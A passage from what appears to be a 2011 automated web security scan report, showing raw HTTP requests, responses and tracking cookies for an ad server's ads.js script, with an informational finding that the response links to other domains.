Z0vbPY7NuPCkRfUJhuE9AG4r1_YBTH-5c5XvIOWMQKl-cdIC2fZhQepvvG5ZZZnAWHUIL1Guk7LM91kn-aJkpfOMQrt0lXDDGNIVD1SIh95bnm5A1FODwtLmHFCk4l3u4YUf8ReOuAPhbr9Nk34bCLmfH7Nl8tw2WqHUUkZ98JnJB6oWA0COW-xJeoEq79QtrOIBhaDR4tImYyfQddC6mxEIQGL9aux0Wy38Bq74ivwwUQ60dTkdFij10MJiUa9kl48TEunCtFLndtCy8eree7J9IekinTGw43yVJN00xxmSO3Zgc6iCsG01x0Dd27QFsrbn5uOBEJpIq5XcXboltYJTZc5dzQZbKS7KFurg7MY4t3auAill3FqTv4t7sCFOwxvjx_ZcdII-FGoXPlGQ-BM8eHGmxiK1X6esaML5Acc_Llvj5X9yLN7-Yc2YS4k_EO88xj88xPI03nF5WXwZ25; fc=sVaQWGK_c_yr5nji4YJUfcbLxG6Rjky-ZVHROMXM-1E4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhYlRW_MKDTtf-sBpmbpaidAFDzQrUnrBcELT8jzJBt9GgVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=VrozooDcByghq55gga6oN_Blt_n-BRpYF3beF1itT8sIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRNS2adKbTT6osPmdQ8QvGT_B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:25:00 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=HHrIK5hAlUnQBoCN0bSvefMc2aF_d4O6NbvYHyiG4jrAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7aaNTkI9kS54NknjDupuixK5USU-ZcOXIQo4iBgywgxw7fwESJ4HNhmJtjvBex-YKBtMoOjMfgnqSKBm8uRROyp_0wuBEv5K59-FgY_KS69_toCOQisz4wYu1aRlLO_q9dObNhCfGM-ksQnUh4TxpdHemNa-3CGw7dg2Xbxl9yyj6AYjXhTSIw6z6qbZ6xheAvhNKKp2uy6Jf_izbJ4fT1IEPHO3_r72yVU4GQkE5oTqqXa0db9PEB0kZFgOkbWCiJqGjdQJTtjVZ9bXK_YQ_BTgtVJj4_1ydNStOQnPPrnrG1HPNJmxjyYHWoZ-RvqO1RjP6j5yoDetv1dHSPkIYgPFTUpFr2Sd9cwp1pS459Skh3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeM37Bfigr7HDTxZoxZiwsWfX15VcAFldmraeNOcTMkrum9YpuWKbAR0rzdoecy5gZy3WXyJHyyuomO7DjHx9DERtBPdeqoht9ByqjYbOh33u-1d3YQe7N-3IAQesJf2UHCk5ZCkZva7scR7OAbaax21Ec8OVkmsGiB-c6iWVn9ld27GAKZi-oEp2bDk9Utrxk7fwESJ4HNhmJtjvBex-YKDJQD84niFp1gCpoN54_iTS7dQaUAsNKGmGOpY_21OIIyOjD7OO6-cARpkZSLPRSVlzaD4aw7phrXQ8Sa65QbHAemNa-3CGw7dg2Xbxl9yyjzPaDe3o_bL1Qxs5JcgZIBEwfqRHkdzRktg9x4ASm7mYEUY0gkSIQpBXzynTrJNwCSFM3wJ2ug19vueYnHYtN1xe2P_hhg7Zbh0pY2S6uagWAKvNWR9DVB7s857bYqH-vZR6D3V1MZpXDmdmkMw9H28y3_SMVKIz-IywSNv3WzvIF-t4yaRUKwYipw0CJzB0aIjgoipP0yyjzR5ioI9loz99U1RtOkWEInQ5e--zZMdSVdA-aRZXmNDP7lSI2wQSGyeUFM0FnJRRrPYsBbxvhPCuAxHKY_BYCKAf2FzvKM6_svKMY-WOYUH6QaQPs9bAqtnbooWp_NrkXSMzjtGaat6yYLZMG4wQKFopdYuz1yBk-BAyTBTFwNjYduwxOD4xUkQkq0n0yMG86X_ZGC4oqWnwItPsoAoxJQfw-oyEQxRyhTeXLgOjd5mCNMGZRMvzlM-SIYtOVAAH4DJGVnLyE0zHY91AS25fF1MGItnXKXtvQQ0XtSgyP9-pRtjKBA9CwziYiIFZaUlrv8g-zYvqHHpjw1q3jr96MmE73EdnErm3L1-gbIWhcHpgba-bkNmD98dgLeBf_Vl6MIVnKxMALSuj37arSozuBgqeZjp8etrKZBIl9s2WXnmelQBS41tEU4KqMVJJLJFDSB1wQojnNFImZOIrKkZ-0eszXplpY4YQXnDiLDBqyosL8KyUlDOLbOUwHwhiIhI6vYlDAmBKnXvMqSvs52IOLcaY_lbOwL7psDf_Pg2Vk_EWg-3dTD9pFYOZom_dEc7B4kQgu9vbZKtEwlYAq2bVnwph6eqpjpOTl7s6FAXEc8n5El2XcbrTuandLa9TdSokJHtMGGH7U6ZV0D5pFleY0M_uVIjbBBIbk23oiSXPjciHxzjuyXjG-zeqT6hUnbo2htLjMWqUwdTc0Z54gQS40DQvJIuqPCvcJKTepk1MIfmuO0KP08mYHrJgtkwbjBAoWil1i7PXIGT8_7Ynt0HUAVUg1LVCMkJvvdUa0NuxLM2XW_puxeWePs4L_JfIFlRNCH2BuG7vC_L4X8zVG3yrgYLQ9gmeibnuQQ0XtSgyP9-pRtjKBA9Cw16l2Bub3KJ7ymT3J4Bv7dCHggxjgs4w7v5Xlb-5Op5EeGOwOQvlXCQVM9zSiiNHAMwzbS6XH8PIk3LelOrpPmbnTIM_wFLXfcwd5V86XjQkFpy_Vf7zkSF-ItYRvthr17Fbccyc8U5wh4Ud4Hlpu2BSlKVf-0QjJg7odNI1SvXDFZUDCpeqjMAw9BbmEmo9VRTWoBesfzoEDV34GPtDUqWbddG37JENOgdwRu5oBEZT3zNzuVrhEcz_5yMF9anYcUaI5c5g72UFM30Fam4qiIW0kJe224E7ZHXxZky5qxCNQGrife3ozBKJDbsyQMPpr8VRTr8Nl9SK1_WCr4ljw61UakqYfbO7oQoFYd5M61iF1TMePRIs3Ql47Rec4vrEgkid5u8voWars0ao_qpATqNKxYofDxJVJxV2JyJkeGjx8ZZ9F1bENTTHi8N7GFJxIY4oQmqqzgtHazWsPWt1suyfQtl-zq1WlNAP-ra31MFT62KO2zMSbyoDUc4nlNLLQ280wA0cJ2fnl2nbKCRFIwabHeO1tJ0mQSu_lU8mDh79eASK3CzJILgeOVnPR4h-UD67rWzrCvcGN43R9JZamXPrp2SIyybD8qG64FzqzbiUeBKdjk4Q0WseETs1mstawYgQV6i3wLehxniYitFUqB0qx6n4Sx5M49jRDbG3z0fm4MYY6yOCTgcgJUotifXIPRJK_lYL5YT6meUEDXaDLls-s2N0tVF9FTqz_IvmKwsVb_AwgxfUmqv256f9FBhFz4CyJBZn9RINMKTQ3I7SD4IvpVCCi5QQeiCwAJ9mtshbXCXAmoaypZIKgDK2iZjUMEHuD9RnwyqD6Wq4bpy4mdj_D31tIFSPkJtTzkjXOkPl_cbJQJZDq2DASl7w2QDy2QYmdPtnHx9mNsQY77FlIMWTLthiL3azxi9cuGtaEnuseRERcltLCZN_0co_nleqLBgTHojRjIRAh8vFi-Kmm4PMWBGUMhX2n_owm7INZ823IXME2xcYfKsf5GA1n12R_KQ-bGhuMfAWIgr36FcFp2Kx6ETUIw9pUPtaaVCHK9LUH-pC5jIpymwqcwLl1rd5sbRVqFfW61UFG3cpiCzVVePtMQUHcLxWKuNPb9-xEnQDOfBE9jjuFfaqW11n4Z8gkAS7CDJ7RbRN2GoeGhDH7CnZm-I2pAxTWEb_rnAJ9X0-6X3tsbjmdaajFaedKpuGiqxqJvmC97USk8cC3zW6yBJ87fVsCdnN_iwA0UeJ2ZVKJC1WZQ2Cj89bgjKG60Lw4qQhUyKcqo87iqD5yFod3mdiwlNyM1oWHNqm8CvbfORytjdRjhbf7JbEIf8rssAHq7NNUrWkXWNCUV4Bx-yj0vrR0UEI6weVfp-RxkFvFbWxjVLfhsMZ5di1Y9J_ey_rda9aQ1LUtbxsDMO-voCN7QR1cLeM_diZYKaxJW8lOtL6k9WjEcr12zdJLmBkIhSDZIzszkCQ6-yypZbuQg6vaMipdlQwgBd_ulQOKnsmllfsMnlfrJRBI_W9CBMajAnCQDtZpQlmb1obfAqGpBTrEEaFD-sL-pUdmR_GMTe8_N0j; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: fc=y4-HEq3o_QsSZuNtsiOwrvFrllcJ9_rUQwZI9DCQgaTcpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBOBkYH-sePWOj8HY_mY9pYLM5X-u9m5dwAGrOdM8vb6gws9mbIcr60LBGz2AczjWmsVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: pf=OgjII4cHhp8HQxROAmJMEkG3BLC8eEQOeJ73B5k4FhYIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRPF7NLQ1XvvumSS375GpfK3B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:24:59 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6;sz=160x600;ord=2809293250540149997?;click=http://r.turn.com/r/tpclick/id/7RxZvFOd_CaL8gwA-wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=2809293250540149997?;click=http://r.turn.com/r/tpclick/id/7RxZvFOd_CaL8gwA-wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=2809293250540149997?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=2809293250540149997?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.41. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=jpgdhg9u3sNhsHaJRlQfD7s3M4ppch86fwqbNsEQoK0hE9MNJhGa6rfuLTDXwqgLUAQw1ppc7q_cXI65lvmh1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLUQtPUcUlC_s56T2e_ZUTBr39Jzt9X3KZSy9qlP-Cz3tgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3j6d2S4vVdi3hczlBeeHjQhxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAeQAItqsK5WhEMkk4Fa_OmlA2N1Iqvj8Efw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=pD_gFAhHZ016tfVkgeG_5InTY8C3-ZePiVSXWMxnqornC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdetVRZLlX36YeiIgwaZY3FpkTJNpTu-tDf4fZLT0FlEqBmvO8Uk9CM6-0joRPbiXR789Ns8YMIodbd9oSQ80dok0rtGkt3b9TtUGpDbpuZJlmnSvjM6YIyaPo076xrJcUMpqvFKCK8YLFH8kku1qHnYE27uj29BfS5yq62USuCcbKSFM-Ia8iW6v4r--R4cQ0uOOC40LIDFF7ghihjQchWX76c4pTy1x4tO_Sj_92V_c3HIM3kTYgp41FGyov4eYc8ZPRlERVaGhUKD4I6xui-k39uQ1iPta8Wrn8c58UAYunU8Ljo1kIO66NNEOBdZGY9MNQF2iyMUjVL7ttzR-BfULWNnrTnHRhAo67h8kocDDs5cySrnTOh9dMxUw7WE-jb8CUGnr_9YMcr_n1EZErhbhuSGd1cU85KfnuzOH-gIz6477_djhhS3SPkBUOiwXvOKnJ5sQzaxqcr382lih416ri-pvt5MhqWaQjjpMBxrbKLi4kFOxMgDpMIvSE-_pNYetk_lkojZdYL09zwtbcpAD7k9QAhA1y9lElb1FxLMTTPDxEi4YsbnV5_AHEyzNvdcWuh9OwP5WPMPXscRpCIMeN1yIaQsj3afG85u2NuDpKflvfwPRcaattTbDebgh5WpDjfslrVyDxMBDlIppEJHdMCxgYn7ExS9rQpLrKZ_Z2nSvjM6YIyaPo076xrJcUMU9pmWoVnBlixHIFlMY3cEkbHzgou97WNb10sLlTme_qfpCL8Eb_AKATM_EJjD9j3iWH9n73vwyS9Iba3Tt9WP76c4pTy1x4tO_Sj_92V_c4P3019yAVgx2_ti72FX3YgMihkX8zucrcdwEbmMe-hv110qkc59lFVJvNpGPUP2wEhW-jakFElzPbLN9KKI4SFMNQF2iyMUjVL7ttzR-BfUx7ZN8WfPOVDlHmKorgnVms5cySrnTOh9dMxUw7WE-jZExyTg0inQXJYzK1oc-65MhhDaCIbRtKqhwxjYbgy7RK477_djhhS3SPkBUOiwXvO8O702X1aYINK4PjXrl81Cri-pvt5MhqWaQjjpMBxrbLRftAx0P2po2mcQN3xnAPWX0ln2ZevenUVZUvpz7ho9D7k9QAhA1y9lElb1FxLMTaQWNZQ9pVECOjwJqf0qS4xcWuh9OwP5WPMPXscRpCIMI17bQKB1MKSjJ4AnwSp4PEjbY-nuOofhw9IqjkaqEohueA6joXijA3s4lagZ_BmcnAhcETWG2r_CoUdLQLtjX1yzr7JSNK1C6Wfrc4PoBe49OjAakl7-2a3YUyQSEcAEadK-MzpgjJo-jTvrGslxQ-aD17WpUy-2kMCPACiI6olM2M4TlfE8-EAAJpHFMIjpLWcQpuP7-rZntDjqWT1AepfX9ysrspxpTakTdWuxDa7vpzilPLXHi079KP_3ZX9zDNdXMQTa13WNC7oLr6-hZ2xcqNpbx_qyOHF8bx__m3LjU2naVq8rzPkfHTZFJAYogPyKWOgXpB9GfxR8d3lqM0w1AXaLIxSNUvu23NH4F9TWnkDgrZHe8T6IOXfKC2_NzlzJKudM6H10zFTDtYT6NhcVjl29PoaOApRJaA6XuwrKBNFaS9_IA_SYgAy6Pzlvrjvv92OGFLdI-QFQ6LBe85Dge1nISCa8_412MA9jLBGuL6m-3kyGpZpCOOkwHGtsoSSTaS2xg6Bv8mW5gJR3yXzlPMql1xzrSAgN1mjs8uJD3XZ60zEd7PscVtFglBi6fn_74IR2tqQOzDhhuuvsvVxa6H07A_lY8w9exxGkIgye2885-8oYawk5NLy_kDdkRRsPWTYc5aSSl5tqKlpE6WckgCGSuiZNCnk1aHQCYkDPgK_vtMxk3J_RnF-KCsLBadK-MzpgjJo-jTvrGslxQxjpLwkY8CzsjWigFXd0ugp0Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4ejlrdfdTeNNQ23r3cVc08dLvpzilPLXHi079KP_3ZX9zLwF1To5J2I9_8J-ktyw5JHi1LtOvJl4H91g0BF7nljG-z8CfdXpYmY1u_oWwboSZ-62KbEowWxnVcnSXWo8CqG_AXolZ7HlYcn1IG2iuDzUm3-TBwK9N_v-cRmWlQKoAs_Y6ICgWasMM5DWElEE3mrRsLtIT2Ygve6thNkIDmTPFiLLg2uvk7lV34RLrT7sDN3vu4WG44zQxf55cnAq2dXP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIQqOlzr39jpVus2s2MGJt02CP-a9-Zc2aK4TggTg7yLFan1KYNZCuznhMO2BM5lPflcAqlDMUSFQwAhqSIWB4T1IuXmPpa4qmXbukrnlZ5AZhfXD4z8mc7oab7q2cflP4Cuw7Sh2zVZs8LUHvh0B4ORTdn2OCYqN2AXXm94C1IFpVYVR8tDeUmGP2D4iuMQCSFfw-YwuOpTTqo7xcxFgip05fDwrMzPs6JG3UjNsUWsBBcQRYk1N7DWc75XJ52KLHxtHGJu2SIaoECffegue6YBx-pMNnjN-kh10ARFgNxf4KgwePV0rhZSAPs0elkMlPPKuRfb5of4RS0KM-vIxCYbmNVwJcjqeJj-8RO-O8uLM5d41RtV-TYB6ZX2Z2f2sWULPjaj-TcixYWnJOckv2x1hkOcqMBa-FJ6vjArRdGUC4ZDF-xhv69qwmZh1BW_sjp_JMv-2OsH7kmJYuX1kJMjBWVrz7u7grGNhHqSIQM0YiFZs1e46yYs72x4V4G5g6skfznJxWLFANSsaDEinwcgAePJitWrkZg8MusjZ42hhaz4NsfZaH43yNAuV5jEfuNBW0UUD1FTrR8dWua3pbTOr3qmCPy6KMbaqZ1CZZZTdO4w56OOE1MWc0ME5geary4IWidZFBM4CXdWml_NgTpNtY7C9ADacWp13yFDNv5QfHWkJGzFLhJWbD2TzP799pVhd2hJTWEIYee2zL7kulFPLjRcdP-8HHM_yAcVuLd1iUr3CDcUNKfecgTUF0tcGU3N-qMYYUsx1t0HBVMuxDw2yb3IRskUU-dEa_gXk_R9CFAHBfb6-R9xgF7P_u8gabLFRUWEK-fROx3Y031mDwLJU1IVthPmLsRdRWx1fxVOkXpv_BNQrM-J_qzhSw9GPlerfb1VYq4tSTzJHZO-4mVs-dIKwEw_MUzZNPrbaVRvLeGtyG2uR1W_3gwxi8sWv9CqOFUDyegOYAwbeZGxYpwBYsSdyFlGM3KDJPLAebY4k60AZXH9DSc16U42vooYbtVxfvV4W5wlx75RUOO2HiQFm0Nl_lo0Vbm-d7snQaJ8ckL1DbpmZ33jmhZs2ZSpc_Ke_v4SMlvUaAfh97W6LUjGnlIIhFHICklznXqDkhBy-iycabDvZFbaJMzr-ki6_1LjeUvSL-YDv7U7RseZZTJ; fc=9_5ay7rffuoTiRWSKxNkRHoXEcukANXik7WwoUVZ9ojWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF_hBg4ZnscOU_y7Sc1CSCH9rInWq2zX4VXT-XKnjQ0qC3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; pf=B7ZBnPXRFmyqr3AjEaKP5FRj_CNMFT3q5p6wKb9ZALCS04H7stKnZdMqlx3yK2bU52sOOuiZ0GSbuZhAi5YdhZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; 